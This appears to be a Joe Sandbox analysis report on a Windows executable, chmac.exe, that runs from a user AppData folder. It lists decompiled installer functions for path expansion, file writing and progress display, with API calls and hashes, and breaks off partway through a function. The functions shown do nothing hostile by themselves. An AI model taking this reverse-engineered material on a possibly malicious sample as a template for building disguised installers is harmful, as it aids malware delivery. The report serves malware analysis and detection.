Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$pzusn
API String ID: 2246997448-3701615307
Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59

Uniqueness

Uniqueness Score: -1.00%

Function 00405AA7, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42367c; // 0x81623d
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x423ed8; // 0x814930
				_t73 = _t72 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t9 = _t73 + 1; // 0x72676f72
					_t39 =  *_t9;
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4; // 0x73e81340
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}

0x00405aa7
0x00405aa7
0x00405aa7
0x00405aad
0x00405ab2
0x00405ab4
0x00405ac3
0x00405ac3
0x00405ac5
0x00405ace
0x00405ad0
0x00405ad5
0x00405ad8
0x00405ad9
0x00405ae0
0x00405ae2
0x00405ae8
0x00405aeb
0x00405aeb
0x00405cc0
0x00405cc0
0x00405cc4
0x00000000
0x00000000
0x00405af8
0x00405afe
0x00000000
0x00000000
0x00405b04
0x00405b05
0x00405b08
0x00405b0b
0x00405cb3
0x00405cbd
0x00405cbf
0x00405cbf
0x00405cb5
0x00405cb7
0x00405cb9
0x00405cba
0x00405cba
0x00000000
0x00405cb3
0x00405b11
0x00405b11
0x00405b15
0x00405b1a
0x00405b29
0x00405b2c
0x00405b2e
0x00405b33
0x00405b36
0x00405b39
0x00405b3c
0x00405b3f
0x00405b42
0x00405c5d
0x00405c60
0x00405c90
0x00405c93
0x00405c98
0x00405c9c
0x00405c9c
0x00405ca1
0x00405ca2
0x00405ca7
0x00405caa
0x00405cac
0x00000000
0x00405cac
0x00405c62
0x00405c65
0x00405c7a
0x00405c81
0x00405c67
0x00405c6e
0x00405c6e
0x00405c89
0x00405c8c
0x00405c55
0x00405c56
0x00405c56
0x00000000
0x00405c8c
0x00405b4a
0x00405b4b
0x00405b51
0x00405b53
0x00405b6d
0x00405b6d
0x00405b74
0x00405b74
0x00405b7b
0x00405b7f
0x00405b7f
0x00405b80
0x00405b82
0x00405bbb
0x00405bbe
0x00405bce
0x00405bd1
0x00405bd9
0x00405bdf
0x00405bdf
0x00405c3b
0x00405c3b
0x00405c3d
0x00000000
0x00000000
0x00405be3
0x00405bea
0x00405beb
0x00405bed
0x00405c07
0x00405c15
0x00405c1b
0x00405c1d
0x00405c38
0x00405c38
0x00405c38
0x00000000
0x00405c38
0x00405c23
0x00405c2e
0x00405c34
0x00405c36
0x00000000
0x00000000
0x00000000
0x00405c36
0x00405bef
0x00405bf2
0x00000000
0x00000000
0x00405c01
0x00405c03
0x00405c05
0x00000000
0x00000000
0x00000000
0x00405c05
0x00000000
0x00405c3b
0x00405bc6
0x00000000
0x00405b84
0x00405b89
0x00405b9f
0x00405ba4
0x00405ba7
0x00405c44
0x00405c44
0x00405c48
0x00405c50
0x00405c50
0x00000000
0x00405c48
0x00405bb1
0x00405c3f
0x00405c3f
0x00405c42
0x00000000
0x00000000
0x00000000
0x00405c42
0x00405b82
0x00405b55
0x00405b59
0x00000000
0x00000000
0x00405b5b
0x00405b5f
0x00000000
0x00000000
0x00405b61
0x00405b65
0x00000000
0x00405b67
0x00405b67
0x00000000
0x00405b67
0x00405b65
0x00405cca
0x00405cd4
0x00405ce0
0x00405ce0
0x00000000

APIs

GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
GetSystemDirectoryA.KERNEL32 ref: 00405BC6
GetWindowsDirectoryA.KERNEL32(pzusn,00000400), ref: 00405BD9
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
SHGetPathFromIDListA.SHELL32(00000000,pzusn), ref: 00405C23
CoTaskMemFree.OLE32(00000000), ref: 00405C2E
lstrcatA.KERNEL32(pzusn,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
lstrlenA.KERNEL32(pzusn,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2

Strings

pzusn, xrefs: 00405AD0, 00405B93, 00405BB0, 00405BC5, 00405BD8, 00405BF4, 00405C1F, 00405C4F, 00405C55, 00405C6D, 00405C80, 00405C9B, 00405CA1, 00405CAC, 00405CD6
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B95
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405C4A

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$pzusn
API String ID: 900638850-4179759605
Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE3, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
CharNextA.USER32(?,?,?,00000000), ref: 00405D48
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

Strings

*?|<>/":, xrefs: 00405D2B
C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE4, 00405D1F
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 00405CE9

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3985186982
Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E9E, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

APIs

GetWindowLongA.USER32 ref: 00403EBB
GetSysColor.USER32(00000000), ref: 00403ED7
SetTextColor.GDI32(?,00000000), ref: 00403EE3
SetBkMode.GDI32(?,?), ref: 00403EEF
GetSysColor.USER32(?), ref: 00403F02
SetBkColor.GDI32(?,?), ref: 00403F12
DeleteObject.GDI32(?), ref: 00403F2C
CreateBrushIndirect.GDI32(?), ref: 00403F36

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4; // 0x62200
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

APIs

GlobalAlloc.KERNEL32(00000040,00062200,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
GlobalFree.KERNEL32 ref: 00402717
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
GlobalFree.KERNEL32 ref: 00402730
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404E23, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

APIs

lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004046F2, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
GetMessagePos.USER32 ref: 00404715
ScreenToClient.USER32 ref: 0040472F
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767

Strings

f, xrefs: 00404743

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402B2D, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
